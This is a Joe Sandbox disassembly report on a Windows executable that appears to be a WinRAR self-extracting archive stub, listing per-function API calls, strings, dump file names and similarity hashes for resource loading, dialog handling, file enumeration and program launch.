SizeofResource.KERNEL32(00000000,?,?,?,00CCB73D,00000066), ref: 00CCA6EC
LoadResource.KERNEL32(00000000,?,?,?,00CCB73D,00000066), ref: 00CCA703
LockResource.KERNEL32(00000000,?,?,?,00CCB73D,00000066), ref: 00CCA712
GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,00CCB73D,00000066), ref: 00CCA72D
GlobalLock.KERNEL32(00000000), ref: 00CCA73E
CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 00CCA762
GlobalUnlock.KERNEL32(00000000), ref: 00CCA7C6

Part of subcall function 00CCA626: GdipAlloc.GDIPLUS(00000010), ref: 00CCA62C

GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 00CCA7A7
GlobalFree.KERNEL32(00000000), ref: 00CCA7CD

Strings

PNG, xrefs: 00CCA6C6

Memory Dump Source

Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd

Similarity

API ID: Global$Resource$AllocCreateGdipLock$BitmapFindFreeFromLoadSizeofStreamUnlock
String ID: PNG
API String ID: 211097158-364855578
Opcode ID: 6b6701b8284f18686911e93493fe7c9f24d52ee04d6568e559ce6706999cd381
Instruction ID: 43986ebce505a512dd82ed34ac3ff04f005e58a8df01b8e8d89cb6edc1bf7c7c
Opcode Fuzzy Hash: 6b6701b8284f18686911e93493fe7c9f24d52ee04d6568e559ce6706999cd381
Instruction Fuzzy Hash: CC316C75A00386ABD7109F21EC8CF2F7AB9FB84754B05051DF91587621EB21E944DBA2

Function 00CBA69B Relevance: 7.6, APIs: 5, Instructions: 105
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindFirstFileW.KERNELBASE(?,?,?,?,?,?,00CBA592,000000FF,?,?), ref: 00CBA6C4

Part of subcall function 00CBBB03: _wcslen.LIBCMT ref: 00CBBB27

FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,00CBA592,000000FF,?,?), ref: 00CBA6F2
GetLastError.KERNEL32(?,?,00000800,?,?,?,?,00CBA592,000000FF,?,?), ref: 00CBA6FE
FindNextFileW.KERNEL32(?,?,?,?,?,?,00CBA592,000000FF,?,?), ref: 00CBA728
GetLastError.KERNEL32(?,?,?,?,00CBA592,000000FF,?,?), ref: 00CBA734

Memory Dump Source

Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd

Similarity

API ID: FileFind$ErrorFirstLast$Next_wcslen
String ID:
API String ID: 42610566-0
Opcode ID: 67aeb91e1ec53c1b2a2dc73be235adea6beb897cb5a3e5cbd01b7c9ec2bf0f1a
Instruction ID: 6229537a054aea1a92aeaae16d820bf65edad2ea0a93553e6d5ad051ef315209
Opcode Fuzzy Hash: 67aeb91e1ec53c1b2a2dc73be235adea6beb897cb5a3e5cbd01b7c9ec2bf0f1a
Instruction Fuzzy Hash: 81416D76900555ABCB25DF64CC88BEEB7B8FB48350F14419AE9A9E3240DB346E90DF90

Function 00CD7DEE Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,00CD7DC4,?,00CEC300,0000000C,00CD7F1B,?,00000002,00000000), ref: 00CD7E0F
TerminateProcess.KERNEL32(00000000,?,00CD7DC4,?,00CEC300,0000000C,00CD7F1B,?,00000002,00000000), ref: 00CD7E16
ExitProcess.KERNEL32 ref: 00CD7E28

Memory Dump Source

Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: d8ad06a31b8889efb8977c61eb3c1d8d67a45c19fba0b77e2e6dbf5c71f2d93f
Instruction ID: 733aa8135f6964d3e6af9e397b9dfc6131145573a22d34420807fc5368a05528
Opcode Fuzzy Hash: d8ad06a31b8889efb8977c61eb3c1d8d67a45c19fba0b77e2e6dbf5c71f2d93f
Instruction Fuzzy Hash: 20E0B631004188EFCF11BF64DD4DB5E7F6AEB50341B004556FA198B632DB3AEE52EA90

Function 00CB848E Relevance: 2.5, APIs: 1, Instructions: 960COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00CB8493

Memory Dump Source

Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 89cdbeaf2f14197ef91c29662b14e2b5369610e262b9dc24072c91a66e6130fc
Instruction ID: b8cc75b5857fc7ce757afac2f0d9a4f701a8296c180084317e965eb6968b730b
Opcode Fuzzy Hash: 89cdbeaf2f14197ef91c29662b14e2b5369610e262b9dc24072c91a66e6130fc
Instruction Fuzzy Hash: 7282FB70904185AEDF25DF74C895BFABBBDAF05300F0841B9E9599B282DB315B8CDB60

Function 00CC6CDC Relevance: .3, Instructions: 343COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 1e766a45244502e98834be5ce099952e2a1a67bd3b3287df9c9493ebd4119a08
Instruction ID: f9915af60b04b528a7c427c923facc9f1e670ecbe3265edb8e5cfb5e5b3fb7c9
Opcode Fuzzy Hash: 1e766a45244502e98834be5ce099952e2a1a67bd3b3287df9c9493ebd4119a08
Instruction Fuzzy Hash: 5BD1D771A083448FDB14CF28C944B5BBBE5FF89308F08466EE8999B342D774EA45CB56

Function 00CCB7E0 Relevance: 102.2, APIs: 48, Strings: 10, Instructions: 731windowfilesleepCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00CCB7E5

Part of subcall function 00CB1316: GetDlgItem.USER32(00000000,00003021), ref: 00CB135A
Part of subcall function 00CB1316: SetWindowTextW.USER32(00000000,00CE35F4), ref: 00CB1370

SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00CCB8D1
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00CCB8EF
IsDialogMessageW.USER32(?,?), ref: 00CCB902
TranslateMessage.USER32(?), ref: 00CCB910
DispatchMessageW.USER32(?), ref: 00CCB91A
GetDlgItemTextW.USER32(?,00000066,?,00000800), ref: 00CCB93D
KiUserCallbackDispatcher.NTDLL(?,00000001), ref: 00CCB960
GetDlgItem.USER32(?,00000068), ref: 00CCB983
SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00CCB99E
SendMessageW.USER32(00000000,000000C2,00000000,00CE35F4), ref: 00CCB9B1

Part of subcall function 00CCD453: _wcslen.LIBCMT ref: 00CCD47D

SetFocus.USER32(00000000), ref: 00CCB9B8
_swprintf.LIBCMT ref: 00CCBA24

Part of subcall function 00CB4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00CB40A5

Part of subcall function 00CCD4D4: GetDlgItem.USER32(00000068,00D0FCB8), ref: 00CCD4E8
Part of subcall function 00CCD4D4: ShowWindow.USER32(00000000,00000005,?,?,?,00CCAF07,00000001,?,?,00CCB7B9,00CE506C,00D0FCB8,00D0FCB8,00001000,00000000,00000000), ref: 00CCD510
Part of subcall function 00CCD4D4: SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00CCD51B
Part of subcall function 00CCD4D4: SendMessageW.USER32(00000000,000000C2,00000000,00CE35F4), ref: 00CCD529
Part of subcall function 00CCD4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00CCD53F
Part of subcall function 00CCD4D4: SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 00CCD559
Part of subcall function 00CCD4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00CCD59D
Part of subcall function 00CCD4D4: SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 00CCD5AB
Part of subcall function 00CCD4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00CCD5BA
Part of subcall function 00CCD4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00CCD5E1
Part of subcall function 00CCD4D4: SendMessageW.USER32(00000000,000000C2,00000000,00CE43F4), ref: 00CCD5F0

GetLastError.KERNEL32(?,00000000,00000000,00000000,?), ref: 00CCBA68
GetLastError.KERNEL32(?,?,00000000,00000000,00000000,?), ref: 00CCBA90
GetTickCount.KERNEL32 ref: 00CCBAAE
_swprintf.LIBCMT ref: 00CCBAC2
GetLastError.KERNEL32(?,00000011), ref: 00CCBAF4
GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,00000000,00000000,00000000,?), ref: 00CCBB43
_swprintf.LIBCMT ref: 00CCBB7C
CreateFileMappingW.KERNEL32(000000FF,00000000,08000004,00000000,00007104,winrarsfxmappingfile.tmp), ref: 00CCBBD0
GetCommandLineW.KERNEL32 ref: 00CCBBEA
MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000,?), ref: 00CCBC47
ShellExecuteExW.SHELL32(0000003C), ref: 00CCBC6F
Sleep.KERNEL32(00000064), ref: 00CCBCB9
UnmapViewOfFile.KERNEL32(?,?,0000430C,?,00000080), ref: 00CCBCE2
CloseHandle.KERNEL32(00000000), ref: 00CCBCEB
_swprintf.LIBCMT ref: 00CCBD1E
SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00CCBD7D
SetDlgItemTextW.USER32(?,00000065,00CE35F4), ref: 00CCBD94
GetDlgItem.USER32(?,00000065), ref: 00CCBD9D
GetWindowLongW.USER32(00000000,000000F0), ref: 00CCBDAC
SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00CCBDBB
SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00CCBE68
_wcslen.LIBCMT ref: 00CCBEBE
_swprintf.LIBCMT ref: 00CCBEE8
SendMessageW.USER32(?,00000080,00000001,?), ref: 00CCBF32
SendDlgItemMessageW.USER32(?,0000006C,00000172,00000000,?), ref: 00CCBF4C
GetDlgItem.USER32(?,00000068), ref: 00CCBF55
SendMessageW.USER32(00000000,00000435,00000000,00400000), ref: 00CCBF6B
GetDlgItem.USER32(?,00000066), ref: 00CCBF85
SetWindowTextW.USER32(00000000,00CFA472), ref: 00CCBFA7
SetDlgItemTextW.USER32(?,0000006B,00000000), ref: 00CCC007
SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00CCC01A
DialogBoxParamW.USER32(LICENSEDLG,00000000,Function_0001B5C0,00000000,?), ref: 00CCC0BD
EnableWindow.USER32(00000000,00000000), ref: 00CCC197
SendMessageW.USER32(?,00000111,00000001,00000000), ref: 00CCC1D9

Part of subcall function 00CCC73F: __EH_prolog.LIBCMT ref: 00CCC744

SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00CCC1FD

Strings

winrarsfxmappingfile.tmp, xrefs: 00CCBBA6
C:\Users\user\Desktop, xrefs: 00CCBBC9
STARTDLG, xrefs: 00CCB801
%s, xrefs: 00CCBED8
LICENSEDLG, xrefs: 00CCC0B2
"%s"%s, xrefs: 00CCBD0D
__tmp_rar_sfx_access_check_%u, xrefs: 00CCBAB5
-el -s2 "-d%s" "-sp%s", xrefs: 00CCBB6B
<, xrefs: 00CCBB84
@, xrefs: 00CCBB91

Memory Dump Source

Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd

Similarity

API ID: Message$ItemSend$Text$Window$_swprintf$File$ErrorLast$DialogH_prologLongView_wcslen$CallbackCloseCommandCountCreateDispatchDispatcherEnableExecuteFocusHandleLineMappingModuleNameParamShellShowSleepTickTranslateUnmapUser__vswprintf_c_l
String ID: %s$"%s"%s$-el -s2 "-d%s" "-sp%s"$<$@$C:\Users\user\Desktop$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_%u$winrarsfxmappingfile.tmp
API String ID: 3445078344-2608530638
Opcode ID: 9ffc09b88b5a6c13d2ee2a1b3b13c4cafc7c72b13dc7c619aeefd75294189659
Instruction ID: 21ba4bcac1cebf126a61359d3ea50f7f55039dce4de45e99249df0392e31d5e8
Opcode Fuzzy Hash: 9ffc09b88b5a6c13d2ee2a1b3b13c4cafc7c72b13dc7c619aeefd75294189659
Instruction Fuzzy Hash: B342C171944348BAEB21ABA0DC8AFFE7B7CAB01700F04415DF659E61D2CB745E49DB22

Function 00CC0863 Relevance: 52.8, APIs: 23, Strings: 7, Instructions: 316
libraryfileloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(kernel32), ref: 00CC087C
GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00CC088E
GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00CC08BF
GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00CC0B69
CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00CC0B83
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00CC0B93
ReadFile.KERNEL32(00000000,?,00007FFE,00CE3C7C,00000000), ref: 00CC0BB1
CloseHandle.KERNEL32(00000000), ref: 00CC0C09
GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00CC0C1E
CompareStringW.KERNEL32(00000400,00001001,?,?,DXGIDebug.dll,?,00CE3C7C,?,00000000,?,00000800), ref: 00CC0C72
GetFileAttributesW.KERNELBASE(?,?,00CE3C7C,00000800,?,00000000,?,00000800), ref: 00CC0C9C
GetFileAttributesW.KERNEL32(?,?,00CE3D44,00000800), ref: 00CC0CD8

Part of subcall function 00CC081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00CC0836
Part of subcall function 00CC081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00CBF2D8,Crypt32.dll,00000000,00CBF35C,?,?,00CBF33E,?,?,?), ref: 00CC0858

_swprintf.LIBCMT ref: 00CC0D4A
_swprintf.LIBCMT ref: 00CC0D96

Part of subcall function 00CB4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00CB40A5

AllocConsole.KERNEL32 ref: 00CC0D9E
GetCurrentProcessId.KERNEL32 ref: 00CC0DA8
AttachConsole.KERNEL32(00000000), ref: 00CC0DAF
_wcslen.LIBCMT ref: 00CC0DC4
GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 00CC0DD5
WriteConsoleW.KERNEL32(00000000), ref: 00CC0DDC
Sleep.KERNEL32(00002710), ref: 00CC0DE7
FreeConsole.KERNEL32 ref: 00CC0DED
ExitProcess.KERNEL32 ref: 00CC0DF5

Strings

SetDefaultDllDirectories, xrefs: 00CC08B9
kernel32, xrefs: 00CC0873
dwmapi.dll, xrefs: 00CC0927, 00CC0D0D
Please remove %s from %s folder. It is unsecure to run %s until it is done., xrefs: 00CC0D84
DXGIDebug.dll, xrefs: 00CC08FC, 00CC0C5E
uxtheme.dll, xrefs: 00CC0D17
SetDllDirectoryW, xrefs: 00CC0888

Memory Dump Source

Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd

Similarity

API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l_wcslen
String ID: DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$dwmapi.dll$kernel32$uxtheme.dll
API String ID: 1207345701-3298887752
Opcode ID: 4557df35dd39eeddc50bfadfad56c7540eacd8bcbb74f41b5167c2633da87816
Instruction ID: 0fb278599774a858403ee09e8c20abe33da593e9d0c3d800d3e1d55a53a5033c
Opcode Fuzzy Hash: 4557df35dd39eeddc50bfadfad56c7540eacd8bcbb74f41b5167c2633da87816
Instruction Fuzzy Hash: A6D15FF14083C4ABDB219F52C88DF9FBAE8AB85704F50491DF2959B150CBB4A749CB62

Function 00CCC73F Relevance: 47.7, APIs: 23, Strings: 4, Instructions: 428
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog.LIBCMT ref: 00CCC744

Part of subcall function 00CCB314: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 00CCB3FB

_wcslen.LIBCMT ref: 00CCCA0A
_wcslen.LIBCMT ref: 00CCCA13
SetWindowTextW.USER32(?,?), ref: 00CCCA71
_wcslen.LIBCMT ref: 00CCCAB3
_wcsrchr.LIBVCRUNTIME ref: 00CCCBFB
GetDlgItem.USER32(?,00000066), ref: 00CCCC36
SetWindowTextW.USER32(00000000,?), ref: 00CCCC46
SendMessageW.USER32(00000000,00000143,00000000,00CFA472), ref: 00CCCC54
SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00CCCC7F

Strings

%s.%d.tmp, xrefs: 00CCC940
<br>, xrefs: 00CCC9D4
ProgramFilesDir, xrefs: 00CCCB45
Software\Microsoft\Windows\CurrentVersion, xrefs: 00CCCB1A

Memory Dump Source

Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd

Similarity

API ID: _wcslen$MessageSendTextWindow$EnvironmentExpandH_prologItemStrings_wcsrchr
String ID: %s.%d.tmp$<br>$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
API String ID: 2804936435-312220925
Opcode ID: 617691eb79e9a1a1fb1902fd3d0733ace38478cf29299b12413d5eea44b85f3f
Instruction ID: 4c6061328879a0902ccbcd2adc4d49b19a27e4330776386226d5cf00c6db9ca3
Opcode Fuzzy Hash: 617691eb79e9a1a1fb1902fd3d0733ace38478cf29299b12413d5eea44b85f3f
Instruction Fuzzy Hash: AAE176B2900258AADF24DBA0DC85FEE73BCAB04350F1440AAF659E7150EF749F859F61

Function 00CBDA67 Relevance: 23.4, APIs: 4, Strings: 9, Instructions: 663COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00CBDA70
GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00CBDAAC

Part of subcall function 00CBC29A: _wcslen.LIBCMT ref: 00CBC2A2

Part of subcall function 00CC05DA: _wcslen.LIBCMT ref: 00CC05E0

Part of subcall function 00CC1B84: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,00CBBAE9,00000000,?,?,?,00010410), ref: 00CC1BA0

_wcslen.LIBCMT ref: 00CBDDE9
__fprintf_l.LIBCMT ref: 00CBDF1C

Strings

RTL, xrefs: 00CBDEDE
*messages***, xrefs: 00CBDBFA
R, xrefs: 00CBDC0C
a, xrefs: 00CBDC16
*messages***, xrefs: 00CBDBC1
, xrefs: 00CBDD6C
,, xrefs: 00CBDF57
@%s:, xrefs: 00CBDF06, 00CBDF12
$%s:, xrefs: 00CBDEFF

Memory Dump Source

Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd

Similarity

API ID: _wcslen$ByteCharFileH_prologModuleMultiNameWide__fprintf_l
String ID: $ ,$$%s:$*messages***$*messages***$@%s:$R$RTL$a
API String ID: 566448164-801612888
Opcode ID: ab3dc5f98c4ef3b4cd61714bd2b497f6949bc656182eb2c4ea4c309046411f58
Instruction ID: 2398518de54f8aec959c4c1b31161eea02ed01c276d06797a483a002415b2d7e
Opcode Fuzzy Hash: ab3dc5f98c4ef3b4cd61714bd2b497f6949bc656182eb2c4ea4c309046411f58
Instruction Fuzzy Hash: 3B32F371900258DBCF24EF68C845BEE77A8FF14700F50056AFA1697292EBB1EE85DB50

Function 00CCD4D4 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 97
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00CCB568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00CCB579
Part of subcall function 00CCB568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00CCB58A
Part of subcall function 00CCB568: IsDialogMessageW.USER32(00010410,?), ref: 00CCB59E
Part of subcall function 00CCB568: TranslateMessage.USER32(?), ref: 00CCB5AC
Part of subcall function 00CCB568: DispatchMessageW.USER32(?), ref: 00CCB5B6

GetDlgItem.USER32(00000068,00D0FCB8), ref: 00CCD4E8
ShowWindow.USER32(00000000,00000005,?,?,?,00CCAF07,00000001,?,?,00CCB7B9,00CE506C,00D0FCB8,00D0FCB8,00001000,00000000,00000000), ref: 00CCD510
SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00CCD51B
SendMessageW.USER32(00000000,000000C2,00000000,00CE35F4), ref: 00CCD529
SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00CCD53F
SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 00CCD559
SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00CCD59D
SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 00CCD5AB
SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00CCD5BA
SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00CCD5E1
SendMessageW.USER32(00000000,000000C2,00000000,00CE43F4), ref: 00CCD5F0

Strings

\, xrefs: 00CCD549

Memory Dump Source

Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd

Similarity

API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
String ID: \
API String ID: 3569833718-2967466578
Opcode ID: 014a531cc1eaefed2a24c51d7d7a55d7f6c512791d4a5a378b6a4da9248ad306
Instruction ID: b6804e9cb59c1403e610ada1f8f795e9ba44d35200b48c09faf20d5a43e0a90e
Opcode Fuzzy Hash: 014a531cc1eaefed2a24c51d7d7a55d7f6c512791d4a5a378b6a4da9248ad306
Instruction Fuzzy Hash: 6C31BE71145342BBE301DF20DC4AFAB7FACEB86704F004518F551D62A0DB749A0AC776

Function 00CCD78F Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 184
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_wcslen.LIBCMT ref: 00CCD7AE
ShellExecuteExW.SHELL32(?), ref: 00CCD8DE
ShowWindow.USER32(?,00000000), ref: 00CCD91D
